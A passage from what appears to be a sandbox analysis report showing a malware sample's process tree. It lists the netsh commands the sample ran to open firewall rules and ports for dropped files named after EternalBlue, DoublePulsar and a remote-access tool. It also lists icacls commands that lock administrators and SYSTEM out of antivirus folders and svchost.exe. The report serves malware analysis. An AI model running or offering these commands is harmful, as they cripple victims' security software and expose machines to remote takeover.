                                                                                                                                  3⤵
                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                  PID:1944
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                2⤵
                                                                                                                                  PID:1780
                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                    netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN
                                                                                                                                    3⤵
                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                    PID:1352
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                  2⤵
                                                                                                                                    PID:1264
                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                      netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                      3⤵
                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                      PID:2764
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                    2⤵
                                                                                                                                      PID:2776
                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                        netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                        3⤵
                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                        PID:1996
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                      2⤵
                                                                                                                                        PID:2080
                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                          netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                          3⤵
                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                          PID:2476
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                        2⤵
                                                                                                                                          PID:1604
                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                            netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes
                                                                                                                                            3⤵
                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                            PID:2548
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                          2⤵
                                                                                                                                            PID:2652
                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                              netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes
                                                                                                                                              3⤵
                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                              PID:2468
                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                            2⤵
                                                                                                                                              PID:2640
                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes
                                                                                                                                                3⤵
                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                PID:2584
                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
                                                                                                                                              2⤵
                                                                                                                                                PID:2536
                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                  netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes
                                                                                                                                                  3⤵
                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                  PID:2148
                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
                                                                                                                                                2⤵
                                                                                                                                                  PID:1692
                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                    netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes
                                                                                                                                                    3⤵
                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                    PID:2156
                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                  C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1712
                                                                                                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                      netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes
                                                                                                                                                      3⤵
                                                                                                                                                      • Modifies Windows Firewall
                                                                                                                                                      PID:1776
                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                    C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
                                                                                                                                                    2⤵
                                                                                                                                                      PID:2860
                                                                                                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                        netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes
                                                                                                                                                        3⤵
                                                                                                                                                        • Modifies Windows Firewall
                                                                                                                                                        PID:1820
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
                                                                                                                                                      2⤵
                                                                                                                                                        PID:1580
                                                                                                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                          netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes
                                                                                                                                                          3⤵
                                                                                                                                                          • Modifies Windows Firewall
                                                                                                                                                          PID:2012
                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                        C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2276
                                                                                                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                            netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes
                                                                                                                                                            3⤵
                                                                                                                                                            • Modifies Windows Firewall
                                                                                                                                                            PID:2988
                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
                                                                                                                                                          2⤵
                                                                                                                                                            PID:944
                                                                                                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                              netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN
                                                                                                                                                              3⤵
                                                                                                                                                              • Modifies Windows Firewall
                                                                                                                                                              PID:2284
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
                                                                                                                                                            2⤵
                                                                                                                                                              PID:1240
                                                                                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN
                                                                                                                                                                3⤵
                                                                                                                                                                • Modifies Windows Firewall
                                                                                                                                                                PID:2128
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
                                                                                                                                                              2⤵
                                                                                                                                                                PID:2644
                                                                                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                  netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out
                                                                                                                                                                  3⤵
                                                                                                                                                                  • Modifies Windows Firewall
                                                                                                                                                                  PID:1656
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                C:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
                                                                                                                                                                2⤵
                                                                                                                                                                  PID:1436
                                                                                                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                                                                                                    netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Modifies Windows Firewall
                                                                                                                                                                    PID:2904
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                  2⤵
                                                                                                                                                                    PID:1556
                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                      icacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                      3⤵
                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                      PID:584
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:2244
                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                        icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                        PID:2040
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                      2⤵
                                                                                                                                                                        PID:2508
                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                          icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                          PID:2512
                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                        2⤵
                                                                                                                                                                          PID:2636
                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                            icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)
                                                                                                                                                                            3⤵
                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                            PID:2788
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                          2⤵
                                                                                                                                                                            PID:868
                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                              icacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                              3⤵
                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                              PID:972
                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
                                                                                                                                                                            2⤵
                                                                                                                                                                              PID:2884
                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)
                                                                                                                                                                                3⤵
                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                PID:2600
                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                              2⤵
                                                                                                                                                                                PID:2680
                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                  icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                  3⤵
                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                  PID:2044
                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                                                2⤵
                                                                                                                                                                                  PID:2696
                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                    icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)
                                                                                                                                                                                    3⤵
                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                    PID:2840
                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                  2⤵
                                                                                                                                                                                    PID:2552
                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                      icacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                      3⤵
                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                      PID:2624
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                                                    2⤵
                                                                                                                                                                                      PID:1608
                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                        icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)
                                                                                                                                                                                        3⤵
                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                        PID:1408
                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                      2⤵
                                                                                                                                                                                        PID:616
                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                          icacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                          3⤵
                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                          PID:1520
                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                                                        2⤵
                                                                                                                                                                                          PID:1744
                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                            icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)
                                                                                                                                                                                            3⤵
                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                            PID:2064
                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                          2⤵
                                                                                                                                                                                            PID:2792
                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                              icacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                              3⤵
                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                              PID:2836
                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
                                                                                                                                                                                            2⤵
                                                                                                                                                                                              PID:2160
                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)
                                                                                                                                                                                                3⤵
                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                PID:2184
                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                              2⤵
                                                                                                                                                                                                PID:2440
                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                  icacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                  PID:2756
                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                                                                2⤵
                                                                                                                                                                                                  PID:2116
                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                    icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)
                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                    PID:2088
                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)
                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                    PID:2560
                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                      icacls c:\programdata\Malwarebytes /deny Admin:(F)
                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                      PID:1352
                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                      PID:1684
                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                        icacls c:\programdata\Malwarebytes /deny System:(F)
                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                        PID:2648
                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)
                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                        PID:2308
                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                          icacls C:\Programdata\MB3Install /deny Admin:(F)
                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                          PID:2312
                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                          PID:1712
                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                            icacls C:\Programdata\MB3Install /deny System:(F)
                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                            PID:2344
                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                            PID:2796
                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                              icacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                              PID:2784
                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                              PID:1820
                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                PID:1344
                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                PID:2260
                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                  icacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                  PID:2300
                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                  PID:2268
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                    icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)
                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                    PID:1748
                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                    PID:1668
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                      icacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                      PID:1088
                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                      PID:1180
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                        icacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                        PID:2520
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                        PID:1656
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                          icacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                          • Modifies file permissions
                                                                                                                                                                                                                          PID:2172
                                                                                                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                        C:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                          PID:1812
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                            icacls C:\KVRT_Data /deny system:(OI)(CI)(F)
                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                            • Modifies file permissions
                                                                                                                                                                                                                            PID:1500
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                          C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                            PID:324
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                              icacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                              3⤵
                                                                                                                                                                                                                              • Modifies file permissions
                                                                                                                                                                                                                              PID:2748
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                            C:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                            2⤵
                                                                                                                                                                                                                              PID:2072
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                icacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                3⤵
                                                                                                                                                                                                                                • Modifies file permissions
                                                                                                                                                                                                                                PID:2876
                                                                                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                              C:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                              2⤵
                                                                                                                                                                                                                                PID:1576
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                  icacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                  3⤵
                                                                                                                                                                                                                                  • Modifies file permissions
                                                                                                                                                                                                                                  PID:1204
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:2544
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                    icacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Modifies file permissions
                                                                                                                                                                                                                                    PID:2884
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                  C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                  2⤵
                                                                                                                                                                                                                                    PID:1116
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                      icacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                      3⤵
                                                                                                                                                                                                                                      • Modifies file permissions
                                                                                                                                                                                                                                      PID:2764
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                    C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                    2⤵
                                                                                                                                                                                                                                      PID:2480
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                        icacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)
                                                                                                                                                                                                                                        3⤵
                                                                                                                                                                                                                                        • Modifies file permissions
                                                                                                                                                                                                                                        PID:2852
                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                      C:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)
                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                        PID:2560
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\icacls.exe
                                                                                                                                                                                                                                          icacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)
